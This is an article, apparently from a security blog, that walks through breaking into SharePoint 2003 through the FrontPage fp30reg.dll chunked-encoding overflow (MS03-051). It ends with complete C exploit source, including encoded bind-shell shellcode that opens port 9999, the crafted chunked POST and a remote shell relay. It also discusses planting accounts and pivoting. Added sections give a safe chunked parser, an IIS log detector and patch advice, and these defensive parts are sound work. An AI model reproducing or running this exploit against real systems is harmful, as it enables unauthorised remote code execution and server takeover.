
Example Attack on SharePoint 2003 With Chunked Encoding and Overflow

In this article I will show how an attacker might break into a SharePoint 2003 environment (this will not work on MOSS) using a few checks and a known IIS exploit. The code is fairly self-explanatory.

Most people who attack Microsoft platforms will note that the default installation directories, as discussed in other articles, are the quickest way to get a hold of a SharePoint site. However, there is other interesting information that can be gathered from the host before you begin your attack, and some fairly common IIS exploits can help with the takeover itself. An attacker will often start with a buffer overflow against the target host, which in some cases allows arbitrary code to be executed on the server. The goal here is to trip a remote buffer overrun in a flaw in the FrontPage Server Extensions (these are frequently still enabled on SharePoint 2003 hosts, for instance where the box is also used for ClickOnce application deployment). Once the overflow lands we have code execution on the server with the privileges associated with the IWAM_machinename account (the same account the crash below is attributed to, not LocalSystem); from there we can look at escalating, creating an account so we can come back to this server later, and using it as a bridge into other systems. The first step is to send a chunked-encoded request to the host; if the overrun trips, the server's event log should show an entry much like this:

————————————————————————
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 2002
Description:
Out of process application ‘/LM/W3SVC/1/ROOT’ terminated unexpectedly.
————————————————————————

You should find this entry in the event log after the request hits the SharePoint site. The request itself looks like POST /_vti_bin/_vti_aut/fp30reg.dll with a Transfer-Encoding: chunked header and a body laid out to the offsets shown in the code. The chunked-encoded POST results in control of ECX and EDI, with the exception occurring at a mov dword ptr [ECX+4],EDI instruction; that controlled four-byte write is what the exploit turns into remote command execution with the privileges associated with the IWAM_machinename account.
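The chunked-transfer framing the request above relies on, and the bounds check that a safe chunk parser has to make, as an added example in C. This is illustrative code written for this page, not the exploit's own code and not Microsoft's; it does not reproduce the fp30reg.dll bug itself, only the general "trust the declared chunk size when copying" mistake that a chunked-encoding overflow abuses. The function names and the sample bodies are assumptions constructed here.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <ctype.h>

/* Frame a payload the way the exploit does: one chunk whose size line is
 * the payload length in hex, then the zero-length last chunk.
 * Returns bytes written, or 0 if it would not fit in out. */
size_t build_chunked_body(const unsigned char *payload, size_t len,
                          unsigned char *out, size_t cap)
{
    int n = snprintf((char *)out, cap, "%zx\r\n", len);
    if (n < 0 || (size_t)n + len + 7 > cap)      /* "\r\n0\r\n\r\n" is 7 bytes */
        return 0;
    memcpy(out + n, payload, len);
    memcpy(out + n + len, "\r\n0\r\n\r\n", 7);
    return (size_t)n + len + 7;
}

/* Decode a chunked body with the checks a safe parser needs: the hex size
 * may not overflow, and every declared chunk must actually be present in the
 * input and fit in the output buffer. Returns decoded length or -1. */
long decode_chunked(const unsigned char *in, size_t inlen,
                    unsigned char *out, size_t outcap)
{
    size_t pos = 0, outlen = 0;
    for (;;) {
        size_t size = 0;
        int digits = 0;
        while (pos < inlen && isxdigit(in[pos])) {
            int v = isdigit(in[pos]) ? in[pos] - '0' : tolower(in[pos]) - 'a' + 10;
            if (size > (SIZE_MAX >> 4)) return -1;     /* size line too long */
            size = (size << 4) | (size_t)v;
            pos++; digits++;
        }
        if (digits == 0) return -1;
        while (pos < inlen && in[pos] != '\r') pos++;  /* skip chunk extensions */
        if (inlen - pos < 2 || in[pos] != '\r' || in[pos + 1] != '\n') return -1;
        pos += 2;
        if (size == 0)                                  /* last chunk, then final CRLF */
            return (inlen - pos >= 2 && in[pos] == '\r' && in[pos + 1] == '\n')
                   ? (long)outlen : -1;
        /* the check an overflowing parser skips: declared size vs bytes on hand */
        if (inlen - pos < 2 || size > inlen - pos - 2) return -1;
        if (size > outcap - outlen) return -1;          /* and vs the destination */
        memcpy(out + outlen, in + pos, size);
        outlen += size;
        pos += size;
        if (in[pos] != '\r' || in[pos + 1] != '\n') return -1;
        pos += 2;
    }
}

/* A body whose size line over-declares what follows (65535 claimed, 4 sent)
 * must be refused rather than copied on trust. Constructed sample input. */
int oversized_chunk_is_rejected(void)
{
    const char *bad = "ffff\r\nAAAA\r\n0\r\n\r\n";
    unsigned char out[64];
    return decode_chunked((const unsigned char *)bad, strlen(bad), out, sizeof out) == -1;
}

int main(void)
{
    unsigned char body[64], out[64];
    size_t n = build_chunked_body((const unsigned char *)"hello", 5, body, sizeof body);
    fwrite(body, 1, n, stdout);
    printf("decoded %ld bytes, oversized rejected: %d\n",
           decode_chunked(body, n, out, sizeof out), oversized_chunk_is_rejected());
    return 0;
}
```

The exploit sends the whole 1499-byte NOP sled as a single chunk, so the interesting comparison is between the declared size on the chunk line and the bytes that actually arrive; a parser that sizes its copy from the former and never compares it with the latter is the shape of bug this article is exploiting.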

The code at the bottom of this article sends the request that trips the overflow and, if the payload runs, connects to the bind shell it opens on TCP port 9999 so we can see whether we are in.

To eliminate this vulnerability, apply the MS03-051 update that fixes the fp30reg.dll overrun, and where the FrontPage Server Extensions are not needed at all, disable them properly, for example with the IIS Lockdown Tool; once the extensions are gone there is no fp30reg.dll for a chunked request to reach.
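On the defensive side, the request this exploit sends leaves a distinctive line in the IIS W3C log (a POST to /_vti_bin/_vti_aut/fp30reg.dll), which can be correlated with the W3SVC Event ID 2002 crash shown above. The following C example is added here and is not part of the original article; it scans a few constructed log lines for that signature. The field order and the sample entries are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Constructed IIS W3C log lines (not real traffic). Assumed field order:
 * date time c-ip cs-method cs-uri-stem cs-uri-query sc-status */
static const char *SAMPLE_LOG[] = {
    "2009-03-01 10:15:02 10.0.0.5  GET  /default.aspx - 200",
    "2009-03-01 10:15:09 10.0.0.77 POST /_vti_bin/_vti_aut/fp30reg.dll - 100",
    "2009-03-01 10:15:10 10.0.0.77 POST /_VTI_BIN/_VTI_AUT/FP30REG.DLL - 500",
    "2009-03-01 10:16:00 10.0.0.8  GET  /_vti_bin/owssvr.dll - 200",
    "2009-03-01 10:16:31 10.0.0.77 POST /_vti_bin/shtml.dll/_vti_rpc - 200",
};
#define SAMPLE_LOG_COUNT (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* case-insensitive string equality */
static int ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == *b;
}

/* true if the URI stem ends in /_vti_aut/fp30reg.dll in any capitalisation;
 * IIS serves the same file whatever case the attacker types */
int uri_is_fp30reg(const char *uri)
{
    const char *needle = "/_vti_aut/fp30reg.dll";
    size_t lu = strlen(uri), ln = strlen(needle);
    return lu >= ln && ieq(uri + lu - ln, needle);
}

/* Parse one log line; returns 1 and copies the client IP if it is a POST
 * to fp30reg.dll (the exploit always POSTs; a GET is at most a probe). */
int is_fp30reg_post(const char *line, char *ip, size_t ipcap)
{
    char cip[64], method[16], uri[512];
    if (sscanf(line, "%*s %*s %63s %15s %511s", cip, method, uri) != 3) return 0;
    if (strcmp(method, "POST") != 0 || !uri_is_fp30reg(uri)) return 0;
    if (ip && ipcap) { strncpy(ip, cip, ipcap - 1); ip[ipcap - 1] = '\0'; }
    return 1;
}

/* Scan a log, print every hit, and return how many were found. */
int count_fp30reg_posts(const char **lines, size_t n)
{
    int hits = 0;
    char ip[64];
    for (size_t i = 0; i < n; i++) {
        if (is_fp30reg_post(lines[i], ip, sizeof ip)) {
            hits++;
            printf("[!] fp30reg.dll POST from %s: %s\n", ip, lines[i]);
        }
    }
    return hits;
}

/* Run the detector over the constructed sample; returns the hit count. */
int demo_sample_hits(void)
{
    return count_fp30reg_posts(SAMPLE_LOG, SAMPLE_LOG_COUNT);
}

int main(void)
{
    printf("%d suspicious request(s)\n", demo_sample_hits());
    return 0;
}
```

A 100 status followed seconds later by a 500 from the same client, as in the sample, is the pattern the exploit above produces: the first POST gets "100 Continue" while the presence check runs, the next one takes the out-of-process application down. Pair the hit with a W3SVC 2002 event at the same time and you have the incident, not just an attempt.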


/* fp30reg.exe - FrontPage fp30reg.dll chunked-encoding overflow (MS03-051).
   Windows-only: uses Winsock 2 and the CRT read/write on the console. */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>
#pragma comment(lib,"ws2_32")
#define VER "0.1"

/******** bind shellcode spawns persistent shell on port 9999 *****************************/
/* first 27 bytes are a decoder that XORs the following 0x1c9 bytes with 0x88 */
unsigned char kyrgyz_bind_code[] = {
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};

void cmdshell(SOCKET sock);
unsigned long gimmeip(char *hostname);

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    struct sockaddr_in targetTCP;
    SOCKET sockTCP;
    int s;
    size_t len;
    unsigned short port = 80;
    unsigned long ip;
    char header[] = "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
    char packet[3000], data[1500];
    /* values placed in the body at the offsets the chunked parser mishandles */
    unsigned char ecx[] = "\xe0\xf3\xd4\x67";   /* writable address in fp30reg.dll .data */
    unsigned char edi[] = "\xff\xd0\x90\x90";   /* call eax ; nop ; nop */
    unsigned char call[] = "\xe4\xf3\xd4\x67";  /* overwrite .data section of fp30reg.dll */
    unsigned char shortjmp[] = "\xeb\x10";      /* jmp short over the next 0x10 bytes */

    printf("\n -={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n", VER);
    if (argc < 2)
    {
        printf(" Usage: %s [Target] [Port]\n"
               " eg: fp30reg.exe 192.168.63.130\n", argv[0]);
        return 1;
    }
    if (argc == 3)
        port = (unsigned short)atoi(argv[2]);
    WSAStartup(0x0202, &wsaData);
    printf("[*] Target: %s Port: %d\n", argv[1], port);
    ip = gimmeip(argv[1]);
    memset(&targetTCP, 0, sizeof(targetTCP));
    memset(packet, 0, sizeof(packet));
    targetTCP.sin_family = AF_INET;
    targetTCP.sin_addr.s_addr = ip;
    targetTCP.sin_port = htons(port);
    sprintf(packet, "%sHost: %s\r\nTransfer-Encoding: chunked\r\n", header, argv[1]);

    /* body: NOP sled with the register-control values and the payload at fixed offsets */
    memset(data, 0x90, sizeof(data) - 1);
    data[sizeof(data) - 1] = '\0';
    memcpy(&data[16], edi, sizeof(edi) - 1);
    memcpy(&data[20], ecx, sizeof(ecx) - 1);
    memcpy(&data[250 + 10], shortjmp, sizeof(shortjmp) - 1);
    memcpy(&data[250 + 14], call, sizeof(call) - 1);
    memcpy(&data[250 + 70], kyrgyz_bind_code, sizeof(kyrgyz_bind_code));

    /* one chunk carrying the whole body, then the terminating zero-length chunk;
       appended at the end of packet rather than sprintf-ing packet into itself */
    len = strlen(packet);
    sprintf(packet + len, "Content-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",
            (int)strlen(data), (unsigned)strlen(data), data);

    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
    {
        printf("[x] Socket not initialized! Exiting...\n");
        WSACleanup();
        return 1;
    }
    printf("[*] Socket initialized...\n");
    if (connect(sockTCP, (struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
        printf("[*] Connection to host failed! Exiting...\n");
        WSACleanup();
        exit(1);
    }
    printf("[*] Checking for presence of fp30reg.dll...");
    if (send(sockTCP, packet, (int)strlen(packet), 0) == SOCKET_ERROR)
    {
        printf("[x] Failed to inject packet! Exiting...\n");
        WSACleanup();
        return 1;
    }
    memset(packet, 0, sizeof(packet));
    if (recv(sockTCP, packet, sizeof(packet) - 1, 0) == SOCKET_ERROR)
    {
        printf("[x] Failed to receive packet! Exiting...\n");
        WSACleanup();
        return 1;
    }
    /* "HTTP/1.1 100 Continue": the server accepted the chunked POST to fp30reg.dll */
    if (packet[9] == '1' && packet[10] == '0' && packet[11] == '0')
        printf(" Found!\n");
    else
    {
        printf(" Not Found!! Exiting...\n");
        WSACleanup();
        return 1;
    }
    printf("[*] Packet injected!\n");
    closesocket(sockTCP);
    printf("[*] Sleeping ");
    for (s = 0; s < 13000; s += 1000)
    {
        printf(". ");
        Sleep(1000);
    }
    printf("\n[*] Connecting to host: %s on port 9999\n", argv[1]);
    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
    {
        printf("[x] Socket not initialized! Exiting...\n");
        WSACleanup();
        return 1;
    }
    targetTCP.sin_family = AF_INET;
    targetTCP.sin_addr.s_addr = ip;
    targetTCP.sin_port = htons(9999);
    if (connect(sockTCP, (struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
        printf("[x] Exploit failed or there is a Firewall! Exiting...\n");
        WSACleanup();
        exit(1);
    }
    printf("[*] Dropping to shell...\n");
    cmdshell(sockTCP);
    return 0;
}

/*********************************************************************************/
/* relay between the console and the bind shell: socket data to stdout,
   stdin to the socket, polling the socket with a one-second select timeout */
void cmdshell(SOCKET sock)
{
    struct timeval tv;
    fd_set rfds;
    int length;
    char buffer[1000];
    tv.tv_sec = 1;
    tv.tv_usec = 0;
    while (1)
    {
        FD_ZERO(&rfds);
        FD_SET(sock, &rfds);
        length = select(0, &rfds, NULL, NULL, &tv);
        if (length == 1)
        {
            length = recv(sock, buffer, sizeof(buffer), 0);
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
            length = _write(1, buffer, length);
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
        }
        else
        {
            length = _read(0, buffer, sizeof(buffer));
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
            length = send(sock, buffer, length, 0);
            if (length <= 0)
            {
                printf("[x] Connection closed.\n");
                WSACleanup();
                return;
            }
        }
    }
}

/*********************************************************************************/
/* accept either a dotted-quad address or a hostname; returns the address in network order */
unsigned long gimmeip(char *hostname)
{
    struct hostent *he;
    unsigned long ipaddr;
    if ((ipaddr = inet_addr(hostname)) == INADDR_NONE)
    {
        if ((he = gethostbyname(hostname)) == NULL)
        {
            printf("[x] Failed to resolve host: %s! Exiting...\n", hostname);
            WSACleanup();
            exit(1);
        }
        memcpy(&ipaddr, he->h_addr, he->h_length);
    }
    return ipaddr;
}